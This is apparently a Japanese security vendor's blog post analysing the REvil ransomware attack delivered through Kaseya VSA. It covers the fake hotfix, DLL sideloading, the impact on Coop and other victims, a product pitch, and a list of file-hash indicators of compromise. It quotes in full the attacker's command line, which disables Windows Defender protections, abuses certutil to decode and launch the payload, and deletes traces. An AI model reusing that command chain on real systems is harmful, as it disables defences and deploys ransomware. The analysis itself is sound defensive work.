Kaseya VSA への REvil ランサムウェア攻撃を解説
SolarWinds 社の SunBurst 攻撃に続き、Kaseya 社も新たなサプライチェーン攻撃の的となりました。この金曜日、Kaseya 社は、クライアントにネットワーク上のマシンへのリモートコントロールアクセスを提供する同社の VSA 製品 が侵害され、Kaseya クライアントのネットワーク環境がランサムウェアに感染させるために使用されたことを発表しました。同社は、すべてのクライアントに対し、VSA サーバを直ちにシャットダウンするよう通知しました。
これまでにわかっていることは以下の通りです。Kaseya VSA は、製品内のまだパッチが適用されていないゼロデイ脆弱性を利用して攻撃されました。VSA にアクセスした後、攻撃者は「Kaseya VSA Agent Hot-fix」と呼ばれる偽の悪意のある自動アップデートを作成し、それを Kaseya のクライアント ネットワークにある VSA サーバにプッシュしました。Kaseya VSA の管理アクセスは、侵害されたサーバに対して無効にされ、悪名高い REvil (別名 Sodinokibi) ランサムウェアがネットワーク上の他のマシンに配信されました。さらに最悪なことに、この攻撃を受けた Kaseya の顧客の何社かは、マネージドサービスプロバイダ (MSP) でした。その結果、攻撃は彼らの顧客のネットワークの一部に影響を与えました。たとえこれらの MSP のクライアントネットワークが Kaseya VSA を持っていなかったとしても、ランサムウェアに感染する可能性があります。
この偽のアップデートは、管理されているすべてのシステムに自動的にインストールされ、「agent.crt」と呼ばれるファイルをKaseya の一時フォルダ(デフォルトでは「c:\kworking」)に配信しました。その後、PowerShell コマンドを使用して Microsoft Windows Defender の機能の多くを無効にし、正規の「certutil.exe」を使用して「agent.crt」をデコードし、「agent.exe」を同じフォルダに展開しました。
ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
Microsoft Windows Defender の機能を無効にし、"agent.crt "をデコードした PowerShell コマンド
「agent.exe 」は、「PB03 TRANSPORT LTD 」の証明書で署名されており、「MsMpEng.exe 」という正規の Microsoft Windows Defender の実行ファイルと、REvil の暗号化ツールである 「mpsvc.dll 」の2つのファイルが埋め込まれていました。そしてこのマルウェアは、DLL サイドローディングと呼ばれる手法を用いて、配信された Windows Defender の実行ファイルにランサムウェアの DLL を実行させました。この戦術は、暗号化プロセスを正規のソフトウェアを介して実行させることを目的としており、実行される可能性が高いのが事実です。
通常、REvil は二重恐喝と呼ばれる方法で被害者に身代金の支払いを迫ります。感染した組織はデータを暗号化されますが、暗号化される前にデータの一部が盗まれており、期限内に全額の身代金を支払わないとデータを公開すると脅されます。しかし、当初は、攻撃者はこの手法を取らず、ファイルを暗号化してバックアップを削除し、感染した企業が身代金を支払った後ファイルを復旧させることを選択したと考えられています。
被害状況の把握
Kaseya は、この攻撃によって影響を受けた企業が 40 社以下であると主張していますが、そのクライアントの多くが複数のクライアントを持つ MSP であることを考えると、被害の影響範囲は計り知れません(現在報告されているものよりもはるかに広範囲であると思われます)。現在のところ、Kaseya の MSP クライアントのうち 20 社が REvil に感染したと推定されており、影響を受けた企業の数は少なくとも 200 社ですが、より多くの企業が被害を受けたことを公表すれば、すぐに数千にものぼる可能性があります。
最初に被害を受けたことを公表した企業は、スウェーデンのスーパーマーケット チェーンである Coop で、彼らのネットワークに REvil が侵入した結果、レジとセルフサービスのチェックアウトが使用できなくなり、800 の店舗を閉店せざるを得なくなりました。このスーパーマーケットが感染したのは、同社の支払システムを管理しているスウェーデンの MSP である Visma 社がKaseya の顧客であり、侵害の結果として危険にさらされたからです。この攻撃は、ランサムウェア攻撃のよる被害のより広い意味を示しています。最初は 1 社のみがターゲットかもしれませんが、感染を阻止するための適切な検出および防止ツールがなければ、感染はすぐに接続された組織やネットワークに広がる可能性があります。
まとめ
今のところ、VSA のセキュリティホールに対するパッチはありません。Kaseya のお客様は、さらなる感染を防ぐために、VSA サーバをシャットダウンすることをお勧めします。
予防第一のアプローチは、ランサムウェアに対する最高の抑止力となります。Deep Instinct では、既知のランサムウェアとゼロデイランサムウェアの両方を実行前に検出して防止し、ファイルに感染する前に停止させます。
300 万ドルの保証付きでランサムウェアを阻止するための業界最先端のアプローチについての詳細をご希望の方は、当社の新しい eBook「 ランサムウェア:事後対応より予防が大事 」をご覧ください。また、実際のデモをご希望の方は、こちらから お問い合わせください。
コンプロマイズの指標
d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e - agent.exe
df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e - agent.exe
dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f - agent.exe
aae6e388e774180bc3eb96dad5d5bfefd63d0eb7124d68b6991701936801f1c7 - agent.exe
66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8 - agent.exe
81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471 - agent.exe
1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e - agent.exe
8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd - mpsvc.dll
e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2 - mpsvc.dll
d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20 - mpsvc.dll
d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f - mpsvc.dll
cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6 - mpsvc.dll
0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402 - mpsvc.dll
8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f - mpsvc.dll